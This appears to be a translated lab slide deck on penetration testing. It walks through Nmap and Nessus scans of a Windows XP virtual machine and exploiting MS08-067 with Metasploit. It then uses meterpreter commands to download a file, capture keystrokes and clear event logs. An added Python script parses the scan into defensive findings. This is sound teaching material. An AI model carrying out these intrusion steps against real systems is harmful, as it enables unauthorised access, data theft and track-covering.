1. Computer Network Security - Laboratory exercise
Adrian Furtună, M.Sc., C|EH, [email_address]
2. Purpose of the exercise
Demonstrate a computer attack using open-source tools: download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.
Walk through the stages of an attack*:
- Reconnaissance
- Scanning and enumeration - Nmap, Nessus
- Gaining access - Metasploit
- Privilege escalation
- Maintaining access
- Covering tracks and installing backdoors
* according to the documentation for the Certified Ethical Hacker certification (EC-Council)
3. Lab preparation (30 min)
Download and install the following tools:
- nmap-5.00-setup.exe (http://nmap.org)
- Nessus-4.0.2-i386.msi (http://www.nessus.org)
- framework-3.3.3.exe (http://www.metasploit.org)
Update the Nessus plugins: "Obtain an activation code" (home feed), then "Register" (after registration the plugin update starts automatically).
Preparing the victim:
- Download locally and unpack the archive: winxp_SP2_strip.zip
- Start the virtual machine: Windows XP Professional.vmx
- Log in: (user: user, pass: user)
- Check connectivity (private network between Host and Guest): ping between Host and Guest
4. Disclaimer
Ethical Hacking / Penetration Testing
- Actions similar to those of an attacker/hacker
- Ethical purpose: discovering vulnerabilities, proposing corrective measures
- No destructive/unapproved actions
- Proactive, preventive activity
5. What we will practice...
Scanning with Nmap:
- open ports
- versions of the exposed services
- operating system version
Scanning with Nessus:
- automatic search for vulnerabilities in the services found earlier
Exploiting a vulnerability with Metasploit:
- gaining access to the target system
6. The attack target (victim)
Operating system: ?????
Exposed services: ?????
Vulnerabilities: ?????
Virtual machine (VMware), firewall ON/OFF, no antivirus
7. Scanning with Nmap (1)
http://insecure.org
nmap -h [fragments]
HOST DISCOVERY:
  -sP: Ping Scan - go no further than determining if host is online
  -PN: Treat all hosts as online -- skip host discovery
  -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
  -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
SCAN TECHNIQUES:
  -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
  -sU: UDP Scan
  -sN/sF/sX: TCP Null, FIN, and Xmas scans
PORT SPECIFICATION AND SCAN ORDER:
  -p <port ranges>: Only scan specified ports
  -F: Fast mode - Scan fewer ports than the default scan
SERVICE/VERSION DETECTION:
  -sV: Probe open ports to determine service/version info
SCRIPT SCAN:
  -sC: equivalent to --script=default
  --script=<Lua scripts>: <Lua scripts> is a comma separated list of
           directories, script-files or script-categories
OS DETECTION:
  -O: Enable OS detection
OUTPUT:
  -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3,
     and Grepable format, respectively, to the given filename.
8. Scanning with Nmap (2)
nmap -sS -sV -O -F -n 10.0.40.69
9. Scanning with Nmap (2)
nmap -sS -sV -O -F -n 10.0.40.69

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).
Not shown: 98 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows XP (93%), Microsoft Windows XP SP2 or SP3 (93%), Microsoft Windows 2003 Small Business Server (92%), Microsoft Windows XP Professional SP2 (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2000 SP4 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.52 seconds
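The scan report above is the raw material a defender reviewing this host would read. As an added example (not code from the original lab deck), the following Python script parses Nmap's normal output into a structured report and turns it into defender-side findings: which ports are reachable, whether a firewall is filtering, and how much the OS fingerprint can be trusted. The embedded sample report is constructed from the slide's output (same host, ports, MAC and OS guesses); the regular expressions are this example's own assumptions about the layout of Nmap's normal output, and the finding texts are the editor's, not the author's.

```python
"""Parse Nmap 'normal' output into findings a defender can act on.

Added example; not part of the original lab deck. The sample report is
constructed from the scan output shown on the slide.
"""
import re
from dataclasses import dataclass, field

# Sample input: constructed from the Nmap output on the slide (line breaks restored,
# OS-guess list shortened to three entries).
SAMPLE_REPORT = """\
Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2010-01-04 17:20 GTB Standard Time
Nmap scan report for 10.254.40.69
Host is up (0.00011s latency).
Not shown: 98 filtered ports
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:0C:29:86:DF:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING) : Microsoft Windows XP|2000|2003 (97%)
Aggressive OS guesses: Microsoft Windows XP SP2 (97%), Microsoft Windows XP SP3 (94%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows
"""

# Assumed layout of Nmap normal output (this example's own patterns).
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})(?: \((.*)\))?")
NOTSHOWN_RE = re.compile(r"^Not shown: (\d+) (\w+) ports")
GUESS_RE = re.compile(r"([^,]+?) \((\d+)%\)")

SMB_PORTS = {139, 445}  # NetBIOS session service and Microsoft-DS (see slide 9 notes)


@dataclass
class ScanReport:
    host: str = ""
    mac: str = ""
    vendor: str = ""
    ports: list = field(default_factory=list)       # dicts: port, proto, state, service, version
    os_guesses: list = field(default_factory=list)  # (name, confidence %) pairs, best first
    os_unreliable: bool = False
    filtered_ports: int = 0


def parse_nmap_normal(text: str) -> ScanReport:
    """Extract host, port table, MAC address and OS guesses from Nmap normal output."""
    r = ScanReport()
    for raw in text.splitlines():
        line = raw.strip()
        if (m := HOST_RE.match(line)):
            r.host = m.group(1)
        elif (m := PORT_RE.match(line)):
            r.ports.append({"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                            "service": m.group(4), "version": (m.group(5) or "").strip()})
        elif (m := MAC_RE.match(line)):
            r.mac, r.vendor = m.group(1), m.group(2) or ""
        elif (m := NOTSHOWN_RE.match(line)):
            r.filtered_ports = int(m.group(1)) if m.group(2) == "filtered" else 0
        elif line.startswith("Aggressive OS guesses:"):
            body = line.split(":", 1)[1]
            r.os_guesses = [(name.strip(), int(conf)) for name, conf in GUESS_RE.findall(body)]
        elif line.startswith("Warning: OSScan results may be unreliable"):
            r.os_unreliable = True
    return r


def assess(report: ScanReport) -> list:
    """Turn the parsed report into defender-side findings (risk plus what to check)."""
    findings = []
    open_ports = sorted(p["port"] for p in report.ports if p["state"] == "open")
    exposed_smb = sorted(set(open_ports) & SMB_PORTS)
    best_os, best_conf = report.os_guesses[0] if report.os_guesses else ("unknown", 0)
    if exposed_smb:
        findings.append(f"SMB/NetBIOS reachable on tcp {exposed_smb}: restrict with the host "
                        f"firewall and confirm the MS08-067 (Server service) patch level.")
    if report.filtered_ports:
        findings.append(f"{report.filtered_ports} ports filtered: a firewall is on but still "
                        f"admits the open ports above; review its allow rules.")
    if report.os_unreliable:
        findings.append(f"OS fingerprint is only a guess ({best_os}, {best_conf}%): verify the "
                        f"OS and service pack from the host or from inventory, not from the scan.")
    if report.vendor == "VMware":
        findings.append("MAC OUI is VMware: the host is a virtual machine (matches the lab setup).")
    return findings


def summarize(text: str) -> dict:
    """Parse and assess in one call; returns the pieces a report (or a test) wants."""
    report = parse_nmap_normal(text)
    return {
        "host": report.host,
        "open_ports": sorted(p["port"] for p in report.ports if p["state"] == "open"),
        "services": {p["port"]: p["service"] for p in report.ports},
        "best_os_guess": report.os_guesses[0] if report.os_guesses else None,
        "findings": assess(report),
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

Run it against a saved `nmap -oN` file by reading the file into `summarize()`; the findings list is where a remediation ticket would start, and the "unreliable" flag is a reminder that the slide's 97% XP SP2 guess came with Nmap's own warning that test conditions were non-ideal.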
10. Scanning with Nessus (1)
http://www.nessus.org
Nessus Server Manager -> Start Nessus Server
Nessus Client:
- Connect - the client connects to the server
- + Networks to scan - specify the IP address of the target machine
- + Select a scan policy - create a new scan policy:
  Plugin Selection -> Disable All
  Plugin Selection -> Windows (enables only the Windows plugins)
- Scan Now - starts the scan
- Export - saves the resulting report
11. Scanning with Nessus (2)
http://www.nessus.org
12. Gaining access - Metasploit (1)
Metasploit architecture: Metasploit Console, Metasploit Web
Modules:
- Exploits - exploit a vulnerability and deliver a payload
- Auxiliaries - port scanning, DoS, fuzzing, etc.
- Payloads - encapsulate arbitrary code (shellcode) that is executed after a successful exploit
- Nops - generate NOP instructions of arbitrary size
Tutorial: http://www.offensive-security.com/metasploit-unleashed/
13. Gaining access - Metasploit (2)
http://www.metasploit.org
We exploit the ms08-067 vulnerability (Conficker/Kido/Downadup)
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx
- Start Metasploit Web
- Exploits -> Search [ms08-067]
- Set TARGET - Windows XP SP2 English
- Set PAYLOAD - windows/meterpreter/bind_tcp (or reverse_tcp)
- Set OPTIONS - RHOST (the victim's IP address)
- Exploit
14. Gaining access - Metasploit (3)
http://www.metasploit.org
15. Gaining access - Metasploit (4)
http://www.metasploit.org
Meterpreter help [fragments]

Stdapi: File system Commands
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory

Stdapi: System Commands
    Command       Description
    -------       -----------
    clearev       Clear the event log
    execute       Execute a command
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
    Command        Description
    -------        -----------
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
16. Completing the exercise objective
Download locally the file secrets.txt located on the desktop of the victim machine by exploiting one of its vulnerabilities.
Meterpreter:
pwd
cd Desktop
ls
download
17. The End
Thank you!
Adrian Furtună, M.Sc., C|EH, [email_address]
? QUESTIONS ?

Laboratory exercise - Network security - Penetration testing


Editor's Notes

  • #3 Reconnaissance: passive activity - gathering information about the target (Google, social engineering, dumpster diving, etc.).
    Scanning and enumeration: active activity - discovering open ports, applications and versions; discovering vulnerabilities.
    Gaining access: exploiting the vulnerabilities found.
    Privilege escalation.
    Maintaining access: e.g. rootkits; fixing the security problem so that it cannot be exploited by other hackers; ensures the ability to return to the attacked system.
    Covering tracks and installing backdoors: rootkits, modifying log files, hiding files, installing trojans.
  • #10 139: NetBIOS Session Service. TCP NetBIOS connections are made over this port, usually with Windows machines but also with any other system running Samba (SMB). These TCP connections form "NetBIOS sessions" to support connection-oriented file sharing activities.
    445: Microsoft-DS (Microsoft Directory Services) is a port used for file sharing. It was introduced with Windows 2000 and gives you the possibility to use the SMB protocol (stands for Server Message Block, but is also known as Samba) directly over TCP/IP on port 445. This port replaces the notorious Windows NetBIOS trio (ports 137-139), for all versions of Windows after NT, as the preferred port for carrying Windows file sharing and numerous other services.
  • #11 Offline update: https://plugins.nessus.org/offline.php
    nessus-fetch.exe --challenge
    nessus-fetch.exe --code-in-use